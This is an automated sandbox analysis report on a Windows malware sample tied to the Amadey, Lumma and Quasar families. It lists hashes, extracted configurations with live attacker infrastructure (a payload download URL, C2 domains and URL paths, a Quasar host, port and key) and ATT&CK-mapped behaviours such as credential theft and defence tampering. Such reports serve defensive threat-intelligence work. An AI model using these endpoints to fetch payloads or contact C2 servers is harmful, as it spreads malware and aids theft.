amadey | 5b5cd13c9b90336605526b2c0d55bb20bfca9edaa47b7c0ad216183094fd1208

Analysis

max time kernel
150s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
02/04/2025, 02:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

3ab551536c724e084f12bedd0592bd1b
SHA1

8e2bceb413446a8342fe69968f23769e3d75d3ef
SHA256

5b5cd13c9b90336605526b2c0d55bb20bfca9edaa47b7c0ad216183094fd1208
SHA512

c963793fd7a3d4e5c608d1a7d99a7ba6015a23b4c0af6c0ac4236bba3339d6f9d045e0ee93833590b7748e4dfa84ecbfdddc72498f5a3a1cbac7041249e9505d
SSDEEP

24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8a0Bu:aTvC/MTQYxsWR7a0B

Score

10^/10

amadey lumma quasar 092155 faec90 office04 bootkit credential_access defense_evasion discovery execution exploit persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://ironloxp.live/aksdd

https://metalsyo.digital/opsa

https://anavstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://rodformi.run/aUosoz

https://navstarx.shop/FoaJSi

https://dmetalsyo.digital/opsa

https://-targett.top/dsANGt

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://skynetxc.live/AksoPA

https://pixtreev.run/LkaUz

https://sparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://hadvennture.top/GKsiio

https://wstarcloc.bet/GOksAo

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Extracted

Family

amadey

Version

5.33

Botnet

faec90

Attributes

install_dir
52907c9546
install_file
tgvazx.exe
strings_key
cc9d94f7503394295f4824f8cfd50608
url_paths
/Di0Her478/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/2988-129-0x000000000CB80000-0x000000000CCD4000-memory.dmp	family_quasar
behavioral1/memory/2988-130-0x000000000CCF0000-0x000000000CD0A000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 5780 created 2664	5780	MSBuild.exe	44

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7ac44a072c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	50702d4ef9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	71da115e9e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE

Blocklisted process makes network request 4 IoCs

flow	pid	Process
19	4552	powershell.exe
39	2988	powershell.exe
40	2988	powershell.exe
42	2988	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3300	powershell.exe
5716	powershell.exe
5856	powershell.exe
4272	powershell.exe
4552	powershell.exe
2988	powershell.exe
5996	powershell.exe
2900	powershell.exe
400	powershell.exe
1956	powershell.exe
220	powershell.exe
1284	powershell.exe
3176	powershell.exe
3480	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 17 IoCs

flow	pid	Process
125	3208	rapes.exe
325	3208	rapes.exe
337	3208	rapes.exe
226	3208	rapes.exe
240	3208	rapes.exe
250	3208	rapes.exe
260	3208	rapes.exe
29	3208	rapes.exe
48	3208	rapes.exe
48	3208	rapes.exe
48	3208	rapes.exe
48	3208	rapes.exe
48	3208	rapes.exe
235	3208	rapes.exe
258	4684	svchost.exe
19	4552	powershell.exe
36	3208	rapes.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1236	netsh.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3132	takeown.exe
3916	icacls.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\vD12X00N_6132\ImagePath = "\\??\\C:\\Windows\\Temp\\1bJsW_6132.sys"	tzutil.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 7 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
4544	msedge.exe
3764	msedge.exe
1960	chrome.exe
5004	chrome.exe
1632	chrome.exe
4988	chrome.exe
4772	msedge.exe

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	50702d4ef9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	50702d4ef9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7ac44a072c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	71da115e9e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	71da115e9e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7ac44a072c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	PQPYAYJJ.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Deletes itself 1 IoCs

pid	Process
4828	w32tm.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_21c8daf7.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_21c8daf7.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_efd7fe32.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_efd7fe32.cmd	powershell.exe

Executes dropped EXE 31 IoCs

pid	Process
4932	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE
3208	rapes.exe
2888	YGYZCmt.exe
1960	rapes.exe
6028	captcha.exe
4872	apple.exe
3756	261.exe
3320	261.exe
3020	7ac44a072c.exe
5344	HAe88WC.exe
5756	h8NlU62.exe
3288	XOPPRUc.exe
1840	7IIl2eE.exe
3092	captcha.exe
3016	Passwords.com
2588	PQPYAYJJ.exe
3204	Abspawnhlp.exe
5580	Abspawnhlp.exe
5016	50702d4ef9.exe
4844	rapes.exe
4068	TbV75ZR.exe
4568	qWR3lUj.exe
4472	p3hx1_003.exe
4040	Rm3cVPI.exe
4024	YGYZCmt.exe
6132	tzutil.exe
4828	w32tm.exe
6824	6862027c44.exe
5884	0ee5eb4d4c.exe
7304	71da115e9e.exe
7768	rapes.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	7ac44a072c.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	50702d4ef9.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	71da115e9e.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE

Loads dropped DLL 11 IoCs

pid	Process
3204	Abspawnhlp.exe
3204	Abspawnhlp.exe
3204	Abspawnhlp.exe
3204	Abspawnhlp.exe
3204	Abspawnhlp.exe
5580	Abspawnhlp.exe
5580	Abspawnhlp.exe
5580	Abspawnhlp.exe
5580	Abspawnhlp.exe
5580	Abspawnhlp.exe
112	Abspawnhlp.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3132	takeown.exe
3916	icacls.exe

Reads ssh keys stored on the system 2 TTPs
Tries to access SSH used by SSH programs.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	captcha.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	7ac44a072c.exe

Enumerates processes with tasklist 1 TTPs 22 IoCs

discovery

Process Discovery

T1057

pid	Process
6128	tasklist.exe
5440	tasklist.exe
4828	tasklist.exe
5652	tasklist.exe
3544	tasklist.exe
5680	tasklist.exe
2352	tasklist.exe
3768	tasklist.exe
2356	tasklist.exe
4292	tasklist.exe
3948	tasklist.exe
4912	tasklist.exe
4824	tasklist.exe
6068	tasklist.exe
4896	tasklist.exe
1216	tasklist.exe
1896	tasklist.exe
4964	tasklist.exe
2400	tasklist.exe
3220	tasklist.exe
3500	tasklist.exe
4404	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
4932	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE
3208	rapes.exe
1960	rapes.exe
3020	7ac44a072c.exe
5016	50702d4ef9.exe
4844	rapes.exe
7304	71da115e9e.exe
7768	rapes.exe

Suspicious use of SetThreadContext 10 IoCs

description	pid	Process	procid_target
PID 2888 set thread context of 5520	2888	YGYZCmt.exe	107
PID 5344 set thread context of 4304	5344	HAe88WC.exe	294
PID 5756 set thread context of 4080	5756	h8NlU62.exe	344
PID 3288 set thread context of 4848	3288	XOPPRUc.exe	348
PID 5580 set thread context of 112	5580	Abspawnhlp.exe	462
PID 4068 set thread context of 5780	4068	TbV75ZR.exe	485
PID 4568 set thread context of 5224	4568	qWR3lUj.exe	506
PID 5580 set thread context of 4468	5580	Abspawnhlp.exe	507
PID 4024 set thread context of 2856	4024	YGYZCmt.exe	520
PID 6824 set thread context of 6868	6824	6862027c44.exe	524

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File created	C:\Windows\Tasks\httpTool_alpha.job	cmd.exe
File created	C:\Windows\Tasks\rapes.job	TempOG6BKZSSJQS0QWCAUT0SXU2IJFERO4EG.EXE
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
4272	powershell.exe
5716	powershell.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5800	sc.exe
5376	sc.exe
4400	sc.exe
3216	sc.exe
1376	sc.exe
932	sc.exe
5548	sc.exe
5016	sc.exe
5996	sc.exe
5068	sc.exe
5592	sc.exe
1656	sc.exe
5468	sc.exe
5656	sc.exe
4676	sc.exe
4056	sc.exe
3616	sc.exe
5776	sc.exe
4060	sc.exe
4052	sc.exe
2952	sc.exe
3764	sc.exe
4584	sc.exe
4048	sc.exe
4408	sc.exe
6072	sc.exe
4320	sc.exe
944	sc.exe
3972	sc.exe
2496	sc.exe
1228	sc.exe
1084	sc.exe
5276	sc.exe
4332	sc.exe
2424	sc.exe
5316	sc.exe
640	sc.exe
5840	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1480	5780	WerFault.exe	485

System Location Discovery: System Language Discovery 1 TTPs 51 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	p3hx1_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-02_3ab551536c724e084f12bedd0592bd1b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	50702d4ef9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	71da115e9e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0ee5eb4d4c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
